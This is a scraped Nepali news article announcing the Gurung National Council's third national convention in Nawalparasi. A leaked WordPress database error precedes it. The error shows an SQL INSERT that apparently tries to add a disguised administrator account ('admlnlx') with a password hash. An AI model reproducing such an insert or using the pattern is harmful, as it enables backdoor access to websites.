WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKn/msCzGHw/x9TV96lMDFXSwHxEXV0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 14:58:25', '', 'admlnlx', 'admlnlx')
नवलपरासी, माघ १३–
तमू ह्युल छोंज धिं गुरुङ राष्ट्रिय परिषद्को तेस्रो महाधिवेशन आगामी माघ २२ गतेदेखि नवलपरासीमा हुने भएको छ ।
‘सम्पूर्ण तमूहरुको साझा अभियान, तमुवानसहितको सङ्घीय संविधान कार्यान्वयनका लागि तेस्रो राष्ट्रिय महाधिवेशन’ भन्ने मूलनाराका साथ महाधिवेशन गर्न लागिएको परिषद्द्वारा आज काठमाडौंमा आयोजित पत्रकार सम्मेलनमा सो जानकारी गराइएको हो ।
तिन दिने सो महाधिवेशनमा मुलुकभरका ६२ वटा जिल्ला र विदेशस्थित २५ संस्थाका प्रतिनिधि र पर्यवेक्षकसहित करिब एक हजारको सहभागिता रहने परिषद्का अध्यक्ष रेशम गुरुङले जानकारी दिनुभयो ।
लोकतान्त्रिक गणतन्त्र नेपालमा जातीय पहिचानसहितको सङ्घीय संविधान जारी गराउनका लागि आदिवासी जनजातिको आन्दोलनको परिणामलाई मूर्तरुप दिन महाधिवेशनले मद्दत गर्ने विश्वास परिषद्को छ ।